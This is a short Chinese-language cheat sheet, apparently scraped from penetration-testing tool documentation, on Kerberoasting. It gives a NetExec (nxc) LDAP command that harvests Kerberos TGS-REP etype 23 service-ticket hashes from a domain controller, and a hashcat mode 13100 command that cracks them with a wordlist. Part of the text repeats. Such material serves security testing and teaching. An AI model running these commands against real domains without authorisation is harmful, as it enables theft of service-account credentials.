Kerberoasting 攻击
使用 Kerberoasting 获取 Kerberos 5 TGS-REP etype 23 哈希
nxc ldap 192.168.0.104 -u harry -p pass --kerberoasting output.txt使用 hashcat 破解
hashcat -m13100 output.txt wordlist.txt示例
有用的资源:
Last updated
使用 Kerberoasting 获取 Kerberos 5 TGS-REP etype 23 哈希
nxc ldap 192.168.0.104 -u harry -p pass --kerberoasting output.txthashcat -m13100 output.txt wordlist.txtLast updated